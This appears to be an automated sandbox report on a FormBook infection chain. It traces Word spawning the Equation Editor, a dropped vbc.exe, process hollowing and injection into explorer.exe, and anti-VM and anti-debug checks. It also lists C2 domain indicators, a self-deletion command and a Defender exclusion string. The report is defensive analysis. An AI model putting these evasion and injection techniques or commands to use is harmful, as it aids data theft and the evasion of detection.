Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2652, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 00000000000C9904 second address: 00000000000C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 00000000000C9B7E second address: 00000000000C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1528	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2576	Thread sleep time: -37574s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2588	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\explorer.exe TID: 2080	Thread sleep time: -36000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe TID: 2028	Thread sleep time: -34000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\raserver.exe

Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00409AB0 rdtsc

4_2_00409AB0

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Queries a list of all running processes

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Contains medium sleeps (>= 30s)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 37574			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.457933367.000000000457A000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000005.00000000.457933367.000000000457A000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000005.00000000.431669651.00000000044E7000.00000004.00000001.sdmp	Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000005.00000000.456077913.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000005.00000000.421288700.00000000045D6000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&00000000g
Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00409AB0 rdtsc

4_2_00409AB0

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A526F8 mov eax, dword ptr fs:[00000030h]		4_2_00A526F8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EB00EA mov eax, dword ptr fs:[00000030h]		6_2_01EB00EA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EB0080 mov ecx, dword ptr fs:[00000030h]		6_2_01EB0080
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01ED26F8 mov eax, dword ptr fs:[00000030h]		6_2_01ED26F8

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040ACF0 LdrLoadDll,

4_2_0040ACF0

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.cuteprofessionalscrubs.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.mountfrenchlodge.net

Sample uses process hollowing technique

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 480000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1764			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1764			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Thread register set: target process: 1764			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp

Binary or memory string: ProgmanG

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation			Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY